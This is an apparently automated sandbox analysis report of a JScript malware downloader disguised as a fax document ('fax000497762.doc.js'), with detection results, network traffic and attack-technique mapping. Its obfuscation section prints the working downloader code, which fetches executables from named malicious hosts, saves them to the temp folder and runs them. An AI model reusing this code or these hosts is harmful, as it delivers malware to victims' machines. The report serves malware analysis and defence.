Play interactive tour

Edit tour

Windows Analysis Report fax000497762.doc.js

Overview

General Information

Sample Name:	fax000497762.doc.js
Analysis ID:	547318
MD5:	b0891ad5d08b7d59615d8f67eacd52da
SHA1:	bff576d43e5f94988ef05f6bec384fcdb590ed1f
SHA256:	c410086a1075dc1210aa7e2ff8f3040d860ca7c98e8805ff5e29b4c1617cbce4
Infos:
Most interesting Screenshot:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for submitted file

JScript performs obfuscated calls to suspicious functions

JavaScript source code contains functionality to generate code involving a shell, file or stream

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

Creates HTML files with .exe extension (expired dropper behavior)

Uses an obfuscated file name to hide its real file extension (double extension)

Java / VBScript file with very long strings (likely obfuscated code)

Uses a known web browser user agent for HTTP communication

Internet Provider seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7164 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\fax000497762.doc.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: fax000497762.doc.js

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: fax000497762.doc.js	Virustotal: Detection: 73%	Perma Link
Source: fax000497762.doc.js	Metadefender: Detection: 70%	Perma Link
Source: fax000497762.doc.js	ReversingLabs: Detection: 73%

Software Vulnerabilities:

JavaScript source code contains functionality to generate code involving a shell, file or stream

Show sources

Source: fax000497762.doc.js

Argument value : ['"var b = "kennedy.sitoserver.com nzvincent.com abama.org".split(" "); var ws = WScript.CreateObject(']

Go to definition

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2022483 ET TROJAN JS/Nemucod requesting EXE payload 2016-01-28 192.168.2.3:49749 -> 143.95.80.178:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe	Domain query: kennedy.sitoserver.com
Source: C:\Windows\System32\wscript.exe	Network Connect: 143.95.80.178 80			Jump to behavior

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

Show sources

Source: fax000497762.doc.js	Argument value : ['"var b = "kennedy.sitoserver.com nzvincent.com abama.org".split(" "); var ws = WScript.CreateObject(']	Go to definition
Source: fax000497762.doc.js	Return value : ['"o.send("']	Go to definition
Source: fax000497762.doc.js	Return value : ['"o.send("']	Go to definition

Creates HTML files with .exe extension (expired dropper behavior)

Show sources

Source: C:\Windows\System32\wscript.exe	File created: 7997551.exe.1.dr
Source: C:\Windows\System32\wscript.exe	File created: 7997552.exe.1.dr
Source: C:\Windows\System32\wscript.exe	File created: 7997553.exe.1.dr

Source: global traffic	HTTP traffic detected: GET /counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090341 HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /404.html HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090342 HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /404.html HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-AliveIf-Modified-Since: Tue, 17 Aug 2021 05:51:21 GMT
Source: global traffic	HTTP traffic detected: GET /counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090343 HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /404.html HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-AliveIf-Modified-Since: Tue, 17 Aug 2021 05:51:21 GMT

Source: Joe Sandbox View

ASN Name: ASMALLORANGE1US ASMALLORANGE1US

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Jan 2022 10:46:50 GMTServer: ApacheLast-Modified: Tue, 17 Aug 2021 05:51:21 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipCache-Control: no-cacheContent-Length: 4677Keep-Alive: timeout=5, max=74Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42

Source: wscript.exe, 00000001.00000003.279703807.000002356DD41000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280508797.000002356E5FE000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279681430.000002356E608000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281218319.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281204027.000002356E601000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280467865.000002356DE65000.00000004.00000040.sdmp, wscript.exe, 00000001.00000003.279575277.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281209766.000002356E60A000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279543403.000002356E653000.00000004.00000001.sdmp, 7997552.exe.1.dr, 7997553.exe.1.dr, 7997551.exe.1.dr, 404[1].htm.1.dr	String found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
Source: wscript.exe, 00000001.00000003.279703807.000002356DD41000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280508797.000002356E5FE000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279681430.000002356E608000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281218319.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281204027.000002356E601000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280467865.000002356DE65000.00000004.00000040.sdmp, wscript.exe, 00000001.00000003.279575277.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281209766.000002356E60A000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279543403.000002356E653000.00000004.00000001.sdmp, 7997552.exe.1.dr, 7997553.exe.1.dr, 7997551.exe.1.dr, 404[1].htm.1.dr	String found in binary or memory: http://gmpg.org/xfn/11
Source: wscript.exe, 00000001.00000003.280467865.000002356DE65000.00000004.00000040.sdmp, wscript.exe, 00000001.00000002.280939026.000002356C043000.00000004.00000001.sdmp	String found in binary or memory: http://kennedy.sitoserver.com/404.html
Source: wscript.exe, 00000001.00000002.281080038.000002356DC84000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280032568.000002356DC78000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280048553.000002356DC7F000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280658444.000002356DC84000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280401912.000002356DC83000.00000004.00000001.sdmp	String found in binary or memory: http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017
Source: wscript.exe, 00000001.00000003.280560819.000002356DD26000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280564368.000002356DD2A000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.280975608.000002356C205000.00000004.00000040.sdmp, wscript.exe, 00000001.00000003.280557224.000002356DD22000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279770126.000002356C20B000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280150519.000002356C20C000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280055761.000002356C20C000.00000004.00000001.sdmp	String found in binary or memory: http://kennedy.sitoserver.com/counter/?id=5552505E160B060116101724160
Source: wscript.exe, 00000001.00000003.279575277.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.280903053.000002356BFCF000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.280939026.000002356C043000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280155787.000002356BF9F000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280272890.000002356C02D000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281213034.000002356E60E000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280199684.000002356C02D000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280429591.000002356BFA8000.00000004.00000001.sdmp	String found in binary or memory: http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E06
Source: wscript.exe, 00000001.00000002.281162072.000002356E5A4000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com

Source: unknown

DNS traffic detected: queries for: kennedy.sitoserver.com

Source: global traffic	HTTP traffic detected: GET /counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090341 HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /404.html HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090342 HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /404.html HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-AliveIf-Modified-Since: Tue, 17 Aug 2021 05:51:21 GMT
Source: global traffic	HTTP traffic detected: GET /counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090343 HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /404.html HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: kennedy.sitoserver.comConnection: Keep-AliveIf-Modified-Since: Tue, 17 Aug 2021 05:51:21 GMT

Source: fax000497762.doc.js

Initial sample: Strings found which are bigger than 50

Source: fax000497762.doc.js	Virustotal: Detection: 73%
Source: fax000497762.doc.js	Metadefender: Detection: 70%
Source: fax000497762.doc.js	ReversingLabs: Detection: 73%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\404[1].htm

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\7997551.exe

Jump to behavior

Source: classification engine

Classification label: mal96.evad.winJS@4/4@1/1

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Data Obfuscation:

JScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"799755"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i<b.length; i++) { var dn = 0; try { xo.open("GET","http://"+b[i]+"/counter/?id="+str+"&rnd=309034"+n, false); xo.send(); if (xo.status == 200) { xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; };ITextStream.WriteLine(" exec:260 f:k6");ITextStream.WriteLine(" exit:1413 f:k6 r:%22n(fn%2Bn%2B%22");ITextStream.WriteLine(" entry:1420 f:s3");ITextStream.WriteLine(" exec:60 f:s3");ITextStream.WriteLine(" exit:1420 f:s3 r:%22%22.exe%22%22");ITextStream.WriteLine(" entry:1427 f:d6");ITextStream.WriteLine(" exec:105 f:d6");ITextStream.WriteLine(" exit:1427 f:d6 r:%22%2C1%2C0)%3B%22");ITextStream.WriteLine(" entry:1434 f:n3");ITextStream.WriteLine(" exec:250 f:n3");ITextStream.WriteLine(" exit:1434 f:n3 r:%22%20%7D%20ca%22");ITextStream.WriteLine(" entry:1441 f:x5");ITextStream.WriteLine(" exec:140 f:x5");ITextStream.WriteLine(" exit:1441 f:x5 r:%22tch%20(%22");ITextStream.WriteLine(" entry:1448 f:x4");ITextStream.WriteLine(" exec:508 f:x4");ITextStream.WriteLine(" exit:1448 f:x4 r:%22er)%20%7B%22");ITextStream.WriteLine(" entry:1455 f:r4");ITextStream.WriteLine(" exec:95 f:r4");ITextStream.WriteLine(" exit:1455 f:r4 r:%22%20%7D%3B%20%7D%3B%22");ITextStream.WriteLine(" entry:1462 f:m4");ITextStream.WriteLine(" exec:533 f:m4");ITextStream.WriteLine(" exit:1462 f:m4 r:%22%20xa.clo%22");ITextStream.WriteLine(" entry:1469 f:r2");ITextStream.WriteLine(" exec:448 f:r2");ITextStream.WriteLine(" exit:1469 f:r2 r:%22se()%3B%20%22");ITextStream.WriteLine(" entry:1476 f:t4");ITextStream.WriteLine(" exec:180 f:t4");ITextStream.WriteLine(" exit:1476 f:t4 r:%22%7D%3B%20if%22");ITextStream.WriteLine(" entry:1483 f:a2");ITextStream.WriteLine(" exec:443 f:a2");ITextStream.WriteLine(" exit:1483 f:a2 r:%22%20(dn%20%22");ITextStream.WriteLine(" entry:1490 f:m8");ITextStream.WriteLine(" exec:543 f:m8");ITextStream.WriteLine(" exit:1490 f:m8 r:%22%3D%3D%201)%22");ITextStream.WriteLine(" entry:1497 f:p6");ITextStream.WriteLine(" exec:463 f:p6");ITextStream.WriteLine(" exit:1497 f:p6 r:%22%20%7B%20ld%20%3D%22");ITextStream.WriteLine(" entry:1504 f:z8");ITextStream.WriteLine(" exec:270 f:z8");ITextStream.WriteLine(" exit:1504 f:z8 r:%22%20i%3B%20br%22");ITextStream.WriteLine(" entry:1511 f:l5");ITextStream.WriteLine(" exec:215 f:l5");ITextStream.WriteLine(" exit:1511 f:l5 r:%22eak%3B%20%7D%22");ITextStream.WriteLine(" entry:1518 f:i8");ITextStream.WriteLine(" exec:310 f:i8");ITextStream.WriteLine(" exit:1518 f:i8 r:%22%3B%20%7D%20ca%22");ITextStream.WriteLine(" entry:1525 f:r9");ITextStream.WriteLine(" exec:623 f:r9");

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)

Show sources

Source: Possible double extension: doc.js

Static PE information: fax000497762.doc.js

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: wscript.exe, 00000001.00000002.281193688.000002356E5E8000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281158110.000002356E5A0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000003.280248477.000002356C043000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279524651.000002356C03E000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.280939026.000002356C043000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWen-USn
Source: wscript.exe, 00000001.00000003.279575277.000002356E618000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&d

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe	Domain query: kennedy.sitoserver.com
Source: C:\Windows\System32\wscript.exe	Network Connect: 143.95.80.178 80			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting32	Path Interception	Process Injection1	Masquerading11	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Application Layer Protocol3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol13	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Scripting32	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information11	NTDS	System Information Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
fax000497762.doc.js	74%	Virustotal		Browse
fax000497762.doc.js	70%	Metadefender		Browse
fax000497762.doc.js	74%	ReversingLabs	Script-JS.Downloader.Swabfex
fax000497762.doc.js	100%	Avira	HTML/ExpKit.Gen2

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090341	0%	Avira URL Cloud	safe
http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017	0%	Avira URL Cloud	safe
http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090342	0%	Avira URL Cloud	safe
http://kennedy.sitoserver.com/counter/?id=5552505E160B060116101724160	0%	Avira URL Cloud	safe
http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090343	0%	Avira URL Cloud	safe
http://kennedy.sitoserver.com/404.html	0%	Avira URL Cloud	safe
http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E06	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kennedy.sitoserver.com	143.95.80.178	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090341	true	Avira URL Cloud: safe	unknown
http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090342	true	Avira URL Cloud: safe	unknown
http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090343	true	Avira URL Cloud: safe	unknown
http://kennedy.sitoserver.com/404.html	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
